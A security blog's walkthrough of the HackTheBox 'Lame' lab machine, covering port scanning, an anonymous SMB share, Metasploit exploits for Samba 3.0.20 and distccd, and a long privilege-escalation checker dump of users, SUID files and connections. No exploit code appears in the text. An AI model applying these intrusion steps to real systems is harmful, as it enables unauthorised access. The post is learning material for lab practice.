NeilSec: Security Learning Blog

Pentesting, infosec, hacking, learning.

  • Home
  • Knowledgebase
You are here: Home / CTF / HackTheBox: Lame – Walkthrough

HackTheBox: Lame – Walkthrough

2018-09-10 by Neil Leave a Comment

Initial Enumeration

Quick syn scan:

Wider and deeper scan:

A quick note on the scans: I generally do basic nmap scans and then use unicornscan for wider port scans because it’s so much quicker, especially with UDP. However HackTheBox VPN appears to interfere with that. So I’ve been ammending my nmap scans with the T4 timing and –max-retries which seems to be a reasonable alternative. The -p- means ports 0-65535. Without the other settings I’ve founds all ports scans to take a ridiculously long time. Unfortunately it still doesn’t make all-ports UDP scans quick enough so I tend set one running and leave it whilst working and if it hits anything, I’ll report on it later.

Initial Scans Summary

An Ubuntu box running: FTP, SSH, SAMBA and something called distccd.

Taking them in turn:

22/FTP

Anonymous access allowed but no permissions to create folders or upload files.

It’s running vsftpd 2.3.4 which has a well-known backdoor that got into the supply chain. This was annoying as I’ve been waiting to see this vulnerability for ages so was a bit excited to see this version show up. However trying the Metasploit module…turns out it doesn’t work. It completes the attempt but won’t create a session. Shame. I won’t bother screenshots of this not working.

139 & 445 / SMB

It’s running SAMBA 3.0.20

enum4linux -A gives a lot of info, amongst which is the following share info:

The share “tmp” is mappable and listable so we should be able to log onto that with a null session:

Not only that but we can also upload a file. The directories are not listable. But they might well point to a user called “makis”.

Exploit and root shell

So some progress but nothing likely to result in a shell. Let’s see if the Samba version is vulnerable:

Looks like there is a Metasploit exploit available so let’s fire that up and see if we can use that:

This gets a root shell so we can collect the root token and it turns out there was a user called “makis” as suspected:

Additional Method

Having rooted this I checked out HTB’s official write-up where it states that the SAMBA exploit is the only route in. This isn’t correct.

Remember nmap also found:

3631/distccd

diskccd, according to my search “is a tool for speeding up compilation of source code by using distributed computing over a computer network. ”

Turns out there is an MSF exploit for that as well:

This one isn’t a straight root shell but gets us in on the daemon user. This user can cat the user.txt and even enter root’s home directory but cannot cat the root.txt. So it needs escalating.

Seeing as we’re going to be doing more than just listing files with this shell, it’s worth upgrading to a tty shell:

After a quick search I find the test.txt file I uploaded using the null SAMBA session in the /tmp directory:

That makes for a very nice way of moving files to and from this box as I can mount it using Kali’s graphical File app and copy and paste my whole PrivEsc tools folder in at once:

Running linuxprivchecker.py:

=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
    Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008
[+] Hostname
    lame
[+] Operating System
    _                  _       _ _        _     _      ____
    _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
    | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
    | | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/
    |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
    |_|
    Warning: Never expose this VM to an untrusted network!
    Contact: msfdev[at]metasploit.com
    Login with msfadmin/msfadmin to get started
[*] GETTING NETWORKING INFO...
[+] Interfaces
    eth0      Link encap:Ethernet  HWaddr 00:50:56:a4:55:32
    inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
    inet6 addr: dead:beef::250:56ff:fea4:5532/64 Scope:Global
    inet6 addr: fe80::250:56ff:fea4:5532/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
    RX packets:635226 errors:0 dropped:0 overruns:0 frame:0
    TX packets:39131 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:121485252 (115.8 MB)  TX bytes:5874487 (5.6 MB)
    Interrupt:19 Base address:0x2000
    lo        Link encap:Local Loopback
    inet addr:127.0.0.1  Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING  MTU:16436  Metric:1
    RX packets:4839 errors:0 dropped:0 overruns:0 frame:0
    TX packets:4839 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:2379609 (2.2 MB)  TX bytes:2379609 (2.2 MB)
[+] Netstat
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
    tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:2049            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:514             0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:8009            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:6697            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:1099            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:8787            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:54195           0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:8180            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -
    tcp        0      0 10.10.10.3:53           0.0.0.0:*               LISTEN      -
    tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:46645           0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:40953           0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      -
    tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:57115           0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -
    tcp        0      0 10.10.10.3:445          10.10.14.19:39956       ESTABLISHED -
    tcp        0      0 10.10.10.3:56809        10.10.14.19:4444        ESTABLISHED 9900/telnet
    tcp        0      0 10.10.10.3:39843        10.10.14.19:4444        ESTABLISHED -
    tcp        0      0 10.10.10.3:39844        10.10.14.19:4444        ESTABLISHED -
    tcp        0   1113 10.10.10.3:56810        10.10.14.19:4444        ESTABLISHED 9903/telnet
    tcp6       0      0 :::2121                 :::*                    LISTEN      -
    tcp6       0      0 :::3632                 :::*                    LISTEN      -
    tcp6       0      0 :::53                   :::*                    LISTEN      -
    tcp6       0      0 :::22                   :::*                    LISTEN      -
    tcp6       0      0 :::5432                 :::*                    LISTEN      -
    tcp6       0      0 ::1:953                 :::*                    LISTEN      -
    udp        0      0 0.0.0.0:2049            0.0.0.0:*                           -
    udp        0      0 0.0.0.0:53124           0.0.0.0:*                           -
    udp        0      0 10.10.10.3:137          0.0.0.0:*                           -
    udp        0      0 0.0.0.0:137             0.0.0.0:*                           -
    udp        0      0 10.10.10.3:138          0.0.0.0:*                           -
    udp        0      0 0.0.0.0:138             0.0.0.0:*                           -
    udp        0      0 127.0.0.1:38291         127.0.0.1:38291         ESTABLISHED -
    udp        0      0 127.0.0.1:161           0.0.0.0:*                           -
    udp        0      0 10.10.10.3:53           0.0.0.0:*                           -
    udp        0      0 127.0.0.1:53            0.0.0.0:*                           -
    udp        0      0 0.0.0.0:69              0.0.0.0:*                           -
    udp        0      0 0.0.0.0:43590           0.0.0.0:*                           -
    udp        0      0 127.0.0.1:34249         0.0.0.0:*                           -
    udp        0      0 0.0.0.0:52684           0.0.0.0:*                           -
    udp        0      0 0.0.0.0:50141           0.0.0.0:*                           -
    udp        0      0 0.0.0.0:111             0.0.0.0:*                           -
    udp        0      0 0.0.0.0:1013            0.0.0.0:*                           -
    udp6       0      0 :::42407                :::*                                -
    udp6       0      0 :::53                   :::*                                -
[+] Route
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
    10.10.10.0      *               255.255.255.0   U     0      0        0 eth0
    default         10.10.10.2      0.0.0.0         UG    100    0        0 eth0
[*] GETTING FILESYSTEM INFO...
[+] Mount results
    /dev/mapper/metasploitable-root on / type ext3 (rw,relatime,errors=remount-ro)
    proc on /proc type proc (rw,noexec,nosuid,nodev)
    /sys on /sys type sysfs (rw,noexec,nosuid,nodev)
    varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755)
    varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777)
    udev on /dev type tmpfs (rw,mode=0755)
    devshm on /dev/shm type tmpfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    /dev/sda1 on /boot type ext3 (rw,relatime)
    securityfs on /sys/kernel/security type securityfs (rw)
    rpc_pipefs on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
    nfsd on /proc/fs/nfsd type nfsd (rw)
[+] fstab entries
    # /etc/fstab: static file system information.
    #
    # <file system> <mount point>   <type>  <options>       <dump>  <pass>
    proc            /proc           proc    defaults        0       0
    # /dev/mapper/metasploitabale-root
    UUID=59bd36ce-2d78-44fe-843f-a4ca5fcafad1 /               ext3    relatime,errors=remount-ro 0       1
    /dev/sda1 /boot           ext3    relatime        0       2
    /dev/scd0       /media/cdrom0   udf,iso9660 user,noauto,exec,utf8 0       0
    /dev/fd0        /media/floppy0  auto    rw,user,noauto,exec,utf8 0       0
[+] Scheduled cron jobs
    -rw-r--r-- 1 root root  724 Apr  8  2008 /etc/crontab
    /etc/cron.d:
    total 20
    drwxr-xr-x  2 root root 4096 May 14  2012 .
    drwxr-xr-x 95 root root 4096 Sep 10 22:59 ..
    -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
    -rw-r--r--  1 root root  492 Jan  6  2010 php5
    -rw-r--r--  1 root root 1323 Mar 31  2008 postgresql-common
    /etc/cron.daily:
    total 60
    drwxr-xr-x  2 root root 4096 Apr 28  2010 .
    drwxr-xr-x 95 root root 4096 Sep 10 22:59 ..
    -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
    -rwxr-xr-x  1 root root  633 Feb  1  2008 apache2
    -rwxr-xr-x  1 root root 7441 Apr 22  2008 apt
    -rwxr-xr-x  1 root root  314 Apr  4  2008 aptitude
    -rwxr-xr-x  1 root root  502 Dec 12  2007 bsdmainutils
    -rwxr-xr-x  1 root root   89 Jun 19  2006 logrotate
    -rwxr-xr-x  1 root root  954 Mar 12  2008 man-db
    -rwxr-xr-x  1 root root  183 Mar  8  2008 mlocate
    -rwxr-xr-x  1 root root  383 Apr 28  2010 samba
    -rwxr-xr-x  1 root root 3295 Apr  8  2008 standard
    -rwxr-xr-x  1 root root 1309 Nov 23  2007 sysklogd
    -rwxr-xr-x  1 root root  477 Dec  7  2008 tomcat55
    /etc/cron.hourly:
    total 12
    drwxr-xr-x  2 root root 4096 Mar 16  2010 .
    drwxr-xr-x 95 root root 4096 Sep 10 22:59 ..
    -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
    /etc/cron.monthly:
    total 20
    drwxr-xr-x  2 root root 4096 Apr 28  2010 .
    drwxr-xr-x 95 root root 4096 Sep 10 22:59 ..
    -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
    -rwxr-xr-x  1 root root  664 Feb 20  2008 proftpd
    -rwxr-xr-x  1 root root  129 Apr  8  2008 standard
    /etc/cron.weekly:
    total 24
    drwxr-xr-x  2 root root 4096 Mar 16  2010 .
    drwxr-xr-x 95 root root 4096 Sep 10 22:59 ..
    -rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
    -rwxr-xr-x  1 root root  528 Mar 12  2008 man-db
    -rwxr-xr-x  1 root root 2522 Jan 28  2008 popularity-contest
    -rwxr-xr-x  1 root root 1220 Nov 23  2007 sysklogd
[+] Writable cron dirs

[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
    08:34:19 up  9:34,  1 user,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
    root     pts/0    :0.0             23:00    9:34   0.00s  0.00s -bash
[+] Sudoers (privileged)
[+] All users
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    dhcp:x:101:102::/nonexistent:/bin/false
    syslog:x:102:103::/home/syslog:/bin/false
    klog:x:103:104::/home/klog:/bin/false
    sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
    bind:x:105:113::/var/cache/bind:/bin/false
    postfix:x:106:115::/var/spool/postfix:/bin/false
    ftp:x:107:65534::/home/ftp:/bin/false
    postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
    tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
    distccd:x:111:65534::/:/bin/false
    service:x:1002:1002:,,,:/home/service:/bin/bash
    telnetd:x:112:120::/nonexistent:/bin/false
    proftpd:x:113:65534::/var/run/proftpd:/bin/false
    statd:x:114:65534::/var/lib/nfs:/bin/false
    snmp:x:115:65534::/var/lib/snmp:/bin/false
    makis:x:1003:1003::/home/makis:/bin/sh
[+] Current User ID
    uid=1(daemon) gid=1(daemon) groups=1(daemon)
[+] Super Users Found:
    root
[+] Environment
    _DISTCC_SAFEGUARD=1
    TERM=linux
    QUIET=no
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    _=/usr/bin/env
    runlevel=2
    RUNLEVEL=2
    UPSTART_EVENT=runlevel
    PWD=/tmp/PrivescTools
    VERBOSE=no
    previous=N
    PREVLEVEL=N
    SHLVL=7
    UPSTART_JOB=rc2
    UPSTART_JOB_ID=5
[+] Current User
    daemon
[+] Root and current user history (depends on privs)
    lrwxrwxrwx 1 root root 9 May 14  2012 /root/.bash_history -> /dev/null
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
    drwxrwxrwt 2 root root 40 Sep 10 22:59 /dev/shm
    drwxrwxrwt 3 root root 60 Sep 10 23:00 /var/lock
    drwx-wx-wt 2 root root 4096 Mar 14  2017 /var/lib/php5
    drwxrwxrwt 2 root root 4096 May 20  2012 /var/tmp
    drwxrwxrwt 7 root root 4096 Sep 11 08:31 /tmp
    drwxrwxrwt 2 root root 4096 Sep 10 22:59 /tmp/.ICE-unix
    drwxrwxrwt 2 root root 4096 Sep 10 23:00 /tmp/.X11-unix
[+] World Writeable Directories for Users other than Root
[+] World Writable Files
[+] Checking if root's home folder is accessible
    /root:
    total 80K
    drwxr-xr-x 13 root root 4.0K Sep 10 23:00 .
    drwxr-xr-x 21 root root 4.0K May 20  2012 ..
    -rw-------  1 root root  373 Sep 10 23:00 .Xauthority
    lrwxrwxrwx  1 root root    9 May 14  2012 .bash_history -> /dev/null
    -rw-r--r--  1 root root 2.2K Oct 20  2007 .bashrc
    drwx------  3 root root 4.0K May 20  2012 .config
    drwx------  2 root root 4.0K May 20  2012 .filezilla
    drwxr-xr-x  5 root root 4.0K Sep 10 23:00 .fluxbox
    drwx------  2 root root 4.0K May 20  2012 .gconf
    drwx------  2 root root 4.0K May 20  2012 .gconfd
    drwxr-xr-x  2 root root 4.0K May 20  2012 .gstreamer-0.10
    drwx------  4 root root 4.0K May 20  2012 .mozilla
    -rw-r--r--  1 root root  141 Oct 20  2007 .profile
    drwx------  5 root root 4.0K May 20  2012 .purple
    -rwx------  1 root root    4 May 20  2012 .rhosts
    drwxr-xr-x  2 root root 4.0K May 20  2012 .ssh
    drwx------  2 root root 4.0K Sep 10 23:00 .vnc
    drwxr-xr-x  2 root root 4.0K May 20  2012 Desktop
    -rwx------  1 root root  401 May 20  2012 reset_logs.sh
    -rw-------  1 root root   33 Mar 14  2017 root.txt
    -rw-r--r--  1 root root  118 Sep 10 23:00 vnc.log
    /root/.fluxbox:
    total 52K
    drwxr-xr-x  5 root root 4.0K Sep 10 23:00 .
    drwxr-xr-x 13 root root 4.0K Sep 10 23:00 ..
    -rw-r--r--  1 root root   70 May 20  2012 apps
    drwxr-xr-x  2 root root 4.0K May 20  2012 backgrounds
    -rw-r--r--  1 root root  314 May 20  2012 init
    -rw-r--r--  1 root root 2.8K May 20  2012 keys
    -rw-r--r--  1 root root  142 Sep 10 23:00 lastwallpaper
    -rw-r--r--  1 root root   66 May 20  2012 menu
    -rw-r--r--  1 root root   89 May 20  2012 overlay
    drwxr-xr-x  2 root root 4.0K May 20  2012 pixmaps
    -rw-r--r--  1 root root  504 May 20  2012 startup
    drwxr-xr-x  2 root root 4.0K May 20  2012 styles
    -rw-r--r--  1 root root  168 May 20  2012 windowmenu
    /root/.fluxbox/backgrounds:
    total 8.0K
    drwxr-xr-x 2 root root 4.0K May 20  2012 .
    drwxr-xr-x 5 root root 4.0K Sep 10 23:00 ..
    /root/.fluxbox/pixmaps:
    total 8.0K
    drwxr-xr-x 2 root root 4.0K May 20  2012 .
    drwxr-xr-x 5 root root 4.0K Sep 10 23:00 ..
    /root/.fluxbox/styles:
    total 8.0K
    drwxr-xr-x 2 root root 4.0K May 20  2012 .
    drwxr-xr-x 5 root root 4.0K Sep 10 23:00 ..
    /root/.gstreamer-0.10:
    total 16K
    drwxr-xr-x  2 root root 4.0K May 20  2012 .
    drwxr-xr-x 13 root root 4.0K Sep 10 23:00 ..
    -rw-------  1 root root 7.4K May 20  2012 registry.i486.xml
    /root/.ssh:
    total 16K
    drwxr-xr-x  2 root root 4.0K May 20  2012 .
    drwxr-xr-x 13 root root 4.0K Sep 10 23:00 ..
    -rw-r--r--  1 root root  405 May 17  2010 authorized_keys
    -rw-r--r--  1 root root  442 May 20  2012 known_hosts
    /root/Desktop:
    total 8.0K
    drwxr-xr-x  2 root root 4.0K May 20  2012 .
    drwxr-xr-x 13 root root 4.0K Sep 10 23:00 ..
[+] SUID/SGID Files and Directories
    -rwsr-xr-x 1 root root 63584 Apr 14  2008 /bin/umount
    -rwsr-xr-- 1 root fuse 20056 Feb 26  2008 /bin/fusermount
    -rwsr-xr-x 1 root root 25540 Apr  2  2008 /bin/su
    -rwsr-xr-x 1 root root 81368 Apr 14  2008 /bin/mount
    -rwsr-xr-x 1 root root 30856 Dec 10  2007 /bin/ping
    -rwsr-xr-x 1 root root 26684 Dec 10  2007 /bin/ping6
    -rwsr-xr-x 1 root root 65520 Dec  2  2008 /sbin/mount.nfs
    -rwxr-sr-x 1 root shadow 19584 Apr  9  2008 /sbin/unix_chkpwd
    -rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
    drwxrwsr-x 2 root src 4096 Apr 15  2008 /usr/src
    -rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudoedit
    -rwxr-sr-x 1 root utmp 3192 Apr 22  2008 /usr/bin/Eterm
    -rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
    -rwxr-sr-x 1 root tty 8192 Dec 12  2007 /usr/bin/bsd-write
    -rwsr-xr-x 1 root root 8524 Nov 22  2007 /usr/bin/netkit-rsh
    -rwxr-sr-x 1 root ssh 76580 Apr  6  2008 /usr/bin/ssh-agent
    -rwsr-xr-x 1 root root 37360 Apr  2  2008 /usr/bin/gpasswd
    -rwxr-sr-x 1 root mlocate 30508 Mar  8  2008 /usr/bin/mlocate
    -rwxr-sr-x 1 root crontab 26928 Apr  8  2008 /usr/bin/crontab
    -rwsr-xr-x 1 root root 12296 Dec 10  2007 /usr/bin/traceroute6.iputils
    -rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudo
    -rwsr-xr-x 1 root root 12020 Nov 22  2007 /usr/bin/netkit-rlogin
    -rwxr-sr-x 1 root shadow 37904 Apr  2  2008 /usr/bin/chage
    -rwxr-sr-x 1 root utmp 308228 Oct 23  2007 /usr/bin/screen
    -rwxr-sr-x 1 root shadow 16424 Apr  2  2008 /usr/bin/expiry
    -rwsr-xr-x 1 root root 11048 Dec 10  2007 /usr/bin/arping
    -rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
    -rwxr-sr-x 1 root utmp 306996 Jan  2  2009 /usr/bin/xterm
    -rwsr-xr-x 1 root root 19144 Apr  2  2008 /usr/bin/newgrp
    -rwxr-sr-x 1 root tty 9960 Apr 14  2008 /usr/bin/wall
    -rwsr-xr-x 1 root root 28624 Apr  2  2008 /usr/bin/chfn
    -rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
    -rwsr-xr-x 1 root root 23952 Apr  2  2008 /usr/bin/chsh
    -rwsr-xr-x 1 root root 15952 Nov 22  2007 /usr/bin/netkit-rcp
    -rwsr-xr-x 1 root root 29104 Apr  2  2008 /usr/bin/passwd
    -rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr
    -rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
    -r-xr-sr-x 1 root postdrop 10312 Apr 18  2008 /usr/sbin/postqueue
    -r-xr-sr-x 1 root postdrop 10036 Apr 18  2008 /usr/sbin/postdrop
    -rwsr-xr-- 1 root dip 269256 Oct  4  2007 /usr/sbin/pppd
    drwxrwsr-x 2 root staff 4096 Mar 23  2010 /usr/local/share/fonts
    drwxrwsr-x 7 root staff 4096 Mar 23  2010 /usr/local/share/sgml
    drwxrwsr-x 2 root staff 4096 Mar 23  2010 /usr/local/share/sgml/stylesheet
    drwxrwsr-x 2 root staff 4096 Mar 23  2010 /usr/local/share/sgml/declaration
    drwxrwsr-x 2 root staff 4096 Mar 23  2010 /usr/local/share/sgml/dtd
    drwxrwsr-x 2 root staff 4096 Mar 23  2010 /usr/local/share/sgml/entities
    drwxrwsr-x 2 root staff 4096 Mar 23  2010 /usr/local/share/sgml/misc
    drwxrwsr-x 2 root staff 4096 Apr 17  2010 /usr/local/lib/site_ruby/1.8/i486-linux
    drwxrwsr-x 3 root staff 4096 Apr 28  2010 /usr/local/lib/python2.5
    drwxrwsr-x 2 root staff 4096 Apr 28  2010 /usr/local/lib/python2.5/site-packages
    -rwsr-xr-- 1 root telnetd 6040 Dec 17  2006 /usr/lib/telnetlogin
    -rwsr-xr-- 1 root www-data 10276 Mar  9  2010 /usr/lib/apache2/suexec
    -rwsr-xr-x 1 root root 4524 Nov  5  2007 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-x 1 root root 165748 Apr  6  2008 /usr/lib/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 9624 Aug 17  2009 /usr/lib/pt_chown
    drwxr-s--- 2 root dip 4096 Mar 16  2010 /etc/chatscripts
    drwxr-s--- 2 root dip 4096 Mar 16  2010 /etc/ppp/peers
    drwxr-sr-x 2 root bind 4096 Mar 17  2010 /etc/bind
    drwxrwsr-x 2 postgres postgres 100 Sep 10 22:59 /var/run/postgresql
    drwxrwsr-x 2 root mail 4096 Sep 11 06:54 /var/mail
    drwxr-s--- 2 mysql adm 4096 Mar 17  2010 /var/log/mysql
    drwxr-sr-x 2 news news 4096 Mar 16  2010 /var/log/news
    drwxrwsr-x 2 root staff 4096 Apr 15  2008 /var/local
    drwxr-sr-x 44 man root 4096 Sep 11 06:54 /var/cache/man
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/ru.KOI8-R
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/zh_CN
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/fi
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/ko
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/id
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat5
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/pt_BR
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/local
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/hu
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/de
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/ru.UTF-8
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/pt
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/tr
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/fr.UTF-8
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/ru
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/cs
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/pl.UTF-8
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/pl
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/ja
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/es
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/sv
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat3
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat7
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat6
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat1
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/zh_TW
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/it.ISO8859-1
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/it
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/X11R6
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/vi
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/fr
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat8
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/opt
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/fsstnd
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat4
    drwxr-sr-x 2 man root 4096 Mar 17  2010 /var/cache/man/cat2
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/gl
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/pl.ISO8859-2
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/fr.ISO8859-1
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/nl
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/it.UTF-8
    drwxr-sr-x 2 man root 4096 Sep 11 06:54 /var/cache/man/oldlocal
    drwxrwsr-x 2 libuuid libuuid 4096 Mar 16  2010 /var/lib/libuuid
    drwx--s--- 2 postfix postdrop 4096 Sep 10 22:59 /var/spool/postfix/public
[+] Logs containing keyword 'password'
    /var/log/daemon.log:May  5 16:31:42 lame /etc/mysql/debian-start[5297]: WARNING: mysql.user contains 1 root accounts without password!
    /var/log/daemon.log:Sep 10 22:59:39 lame /etc/mysql/debian-start[4817]: WARNING: mysql.user contains 1 root accounts without password!
[+] Config files containing keyword 'password'
    /etc/mysql/my.cnf:# It has been reported that passwords should be enclosed with ticks/quotes
    /etc/mysql/conf.d/old_passwords.cnf:old_passwords = false
    /etc/debconf.conf:# World-readable, and accepts everything but passwords.
    /etc/debconf.conf:Reject-Type: password
    /etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
    /etc/debconf.conf:Name: passwords
    /etc/debconf.conf:Accept-Type: password
    /etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
    /etc/debconf.conf:# databases, one to hold passwords and one for everything else.
    /etc/debconf.conf:Stack: config, passwords
    /etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
    /etc/samba/smb.conf:# You may wish to use password encryption.  See the section on
    /etc/samba/smb.conf:# 'encrypt passwords' in the smb.conf(5) manpage before enabling.
    /etc/samba/smb.conf:   encrypt passwords = true
    /etc/samba/smb.conf:# If you are using encrypted passwords, Samba will need to know what
    /etc/samba/smb.conf:# password database type you are using.
